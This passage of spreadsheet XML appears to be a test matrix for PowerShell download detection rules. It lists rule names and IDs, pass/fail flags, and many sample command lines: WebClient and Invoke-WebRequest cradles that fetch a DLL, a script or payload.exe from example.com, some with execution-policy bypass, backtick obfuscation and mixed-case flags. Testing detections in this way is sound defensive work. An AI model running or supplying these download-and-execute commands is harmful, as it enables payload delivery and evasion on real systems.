      </c>
      <c r="C2033" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2033" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2033" s="4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F2033" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2033" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2033" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2033" s="4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033" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2033" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2034" ht="15.75" customHeight="1" s="42">
      <c r="A2034" s="43" t="n"/>
      <c r="B2034" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2034" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2034" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2034" s="4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F2034" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2034" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2034" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2034" s="4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034" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2034" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2035" ht="15.75" customHeight="1" s="42">
      <c r="A2035" s="43" t="n"/>
      <c r="B2035" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2035" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2035" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2035" s="4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F2035" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2035" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2035" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2035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035" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2035" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2036" ht="15.75" customHeight="1" s="42">
      <c r="A2036" s="43" t="n"/>
      <c r="B2036" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2036" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2036" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2036" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2036" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2036" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2036" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2036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36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2036" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2037" ht="15.75" customHeight="1" s="42">
      <c r="A2037" s="43" t="n"/>
      <c r="B2037" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2037" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2037" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2037" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2037" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2037" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2037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37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2037" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2038" ht="15.75" customHeight="1" s="42">
      <c r="A2038" s="43" t="n"/>
      <c r="B2038" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2038" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2038" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2038" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2038" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2038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38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2038" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2039" ht="15.75" customHeight="1" s="42">
      <c r="A2039" s="43" t="n"/>
      <c r="B2039" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2039" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2039" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2039" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2039" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2039" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2039" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2039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39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2039" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2040" ht="15.75" customHeight="1" s="42">
      <c r="A2040" s="43" t="n"/>
      <c r="B2040" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2040" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2040" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2040" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMANd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2040" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2040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40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2040" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2041" ht="15.75" customHeight="1" s="42">
      <c r="A2041" s="43" t="n"/>
      <c r="B2041" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2041" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2041" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2041" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2041" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2041" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2041" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2041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41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2041" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2042" ht="15.75" customHeight="1" s="42">
      <c r="A2042" s="43" t="n"/>
      <c r="B2042" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C2042" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D2042" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E2042" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F2042" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2042" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2042" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2042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2042" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2042" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2043" ht="15.75" customHeight="1" s="42">
      <c r="A2043" s="43" t="n"/>
      <c r="B2043" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2043" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2043" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2043" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2043" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2043" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2043" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2043" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2044" ht="15.75" customHeight="1" s="42">
      <c r="A2044" s="43" t="n"/>
      <c r="B2044" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2044" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2044" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2044" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2044" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2044" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2044" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2044" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2044" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2044" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2045" ht="15.75" customHeight="1" s="42">
      <c r="A2045" s="43" t="n"/>
      <c r="B2045" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2045" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2045" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2045" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2045" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2045" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2045" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2045" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2046" ht="15.75" customHeight="1" s="42">
      <c r="A2046" s="43" t="n"/>
      <c r="B2046" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2046" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2046" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2046" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaNd "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2046" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2046" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2046" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2046" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2046" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2046" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2047" ht="15.75" customHeight="1" s="42">
      <c r="A2047" s="43" t="n"/>
      <c r="B2047" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2047" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2047" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2047" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaNd "$client = New-Object System.Net.WebClient; $client.DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2047" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2047" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2047" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2047" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2047" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2047" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2048" ht="15.75" customHeight="1" s="42">
      <c r="A2048" s="43" t="n"/>
      <c r="B2048" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2048" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2048" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2048" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2048" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2048" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2048" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2048" s="44" t="n"/>
      <c r="J2048" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2048" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2049" ht="15.75" customHeight="1" s="42">
      <c r="A2049" s="43" t="n"/>
      <c r="B2049" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2049" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2049" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2049" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2049" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2049" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2049" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2049" s="43" t="n"/>
      <c r="J2049" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2049" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2050" ht="15.75" customHeight="1" s="42">
      <c r="A2050" s="43" t="n"/>
      <c r="B2050" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2050" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2050" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2050" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2050" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2050" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2050" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2050" s="44" t="n"/>
      <c r="J2050" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2050" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2051" ht="15.75" customHeight="1" s="42">
      <c r="A2051" s="43" t="n"/>
      <c r="B2051" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2051" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2051" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2051" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2051" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2051" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2051" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2051" s="43" t="n"/>
      <c r="J2051" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2051" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2052" ht="15.75" customHeight="1" s="42">
      <c r="A2052" s="43" t="n"/>
      <c r="B2052" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2052" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2052" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2052" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2052" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2052" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2052" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2052" s="44" t="n"/>
      <c r="J2052" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2052" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2053" ht="15.75" customHeight="1" s="42">
      <c r="A2053" s="43" t="n"/>
      <c r="B2053" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2053" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2053" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2053" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commanD "(New-Object Net.WebC`lient).DownloadString('http://example.com/script.ps1')"</t>
        </is>
      </c>
      <c r="F2053" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2053" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2053" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2053" s="44" t="n"/>
      <c r="J2053" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2053" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2054" ht="15.75" customHeight="1" s="42">
      <c r="A2054" s="43" t="n"/>
      <c r="B2054" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2054" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2054" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2054" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2054" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2054" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2054" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2054" s="4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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2054" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2055" ht="15.75" customHeight="1" s="42">
      <c r="A2055" s="43" t="n"/>
      <c r="B2055" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2055" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2055" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2055" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exECuTIonPolICy Bypass -cOMmand "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2055" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2055" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2055" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2055" s="4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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2055" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2056" ht="15.75" customHeight="1" s="42">
      <c r="A2056" s="43" t="n"/>
      <c r="B2056" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2056" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2056" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2056" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcuTIoNPOlicy Bypass -comMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2056" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2056" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2056" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2056" s="43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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2056" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2057" ht="15.75" customHeight="1" s="42">
      <c r="A2057" s="43" t="n"/>
      <c r="B2057" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2057" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2057" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2057" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2057" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2057" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2057" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2057" s="43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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2057" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2058" ht="15.75" customHeight="1" s="42">
      <c r="A2058" s="43" t="n"/>
      <c r="B2058" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2058" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2058" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2058" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -commAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2058" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2058" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2058" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2058" s="44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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2058" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2059" ht="15.75" customHeight="1" s="42">
      <c r="A2059" s="43" t="n"/>
      <c r="B2059" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2059" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2059" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2059" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -execuTIoNpoLICY Bypass -COMmand "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2059" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2059" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2059" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2059" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc);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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2059" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2060" ht="15.75" customHeight="1" s="42">
      <c r="A2060" s="43" t="n"/>
      <c r="B2060" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_patterns</t>
        </is>
      </c>
      <c r="C2060" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern</t>
        </is>
      </c>
      <c r="D2060" s="44" t="inlineStr">
        <is>
          <t>3b6ab547-8ec2-4991-b9d2-2b06702a48d7</t>
        </is>
      </c>
      <c r="E2060" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmMAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile 'C:\Windows\Temp\payload.exe'"</t>
        </is>
      </c>
      <c r="F2060" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2060" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2060" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2060" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); 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060" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2060" s="44" t="b">
        <v>0</v>
      </c>
    </row>
